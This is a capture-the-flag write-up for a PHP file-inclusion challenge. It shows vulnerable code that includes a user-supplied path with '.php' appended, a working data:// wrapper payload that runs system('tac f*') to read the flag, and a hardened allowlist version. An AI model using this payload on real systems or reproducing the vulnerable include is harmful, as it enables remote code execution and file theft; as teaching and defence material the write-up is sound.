web39 notes (include command execution + ".php" concatenation)

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

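Here $c is concatenated with ".php", but command execution is still possible: the short tag <?= ?> in the payload is already closed, so the appended ".php" falls outside the PHP code and does not affect it.

The payload from the previous challenge therefore still works: ?c=data://text/plain,<?=%20system("tac%20f*");?>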
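For contrast, a hardened form of the same include logic, as an added example that is not part of the original challenge or post: the request value is used only as a lookup key in an allowlist, so neither the data:// wrapper nor the appended suffix ever reaches include(). The page names and file paths are hypothetical.

```php
<?php
// Added example (not from the original challenge): allowlist-based include.
// Page names and paths below are hypothetical.

// The request value is only ever a lookup key, never part of a path.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(string $c): ?string
{
    // Strict key match: "data://text/plain,..." is simply not a key,
    // so no stream wrapper or suffix trick can reach include().
    return PAGES[$c] ?? null;
}

function self_check(): void
{
    // Constructed inputs: one valid key plus values that the /flag/i
    // blacklist in the challenge code would let through.
    $cases = [
        'home'                         => true,
        'data://text/plain,<anything>' => false,
        'home.php'                     => false,
        'HOME'                         => false, // keys are case-sensitive
        ''                             => false,
    ];
    foreach ($cases as $input => $expected) {
        if ((resolve_page((string)$input) !== null) !== $expected) {
            throw new RuntimeException("unexpected result for '$input'");
        }
    }
}

if (PHP_SAPI === 'cli') {
    self_check();
    echo "allowlist checks passed\n";
} else {
    $target = resolve_page((string)($_GET['c'] ?? ''));
    if ($target === null) {
        http_response_code(404);
        exit('Not found');
    }
    include $target;
}
```

As a second layer, keeping allow_url_include = Off in php.ini (the default) stops include() from accepting data:// at all.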

posted @ 2025-03-14 22:50  justdoIT*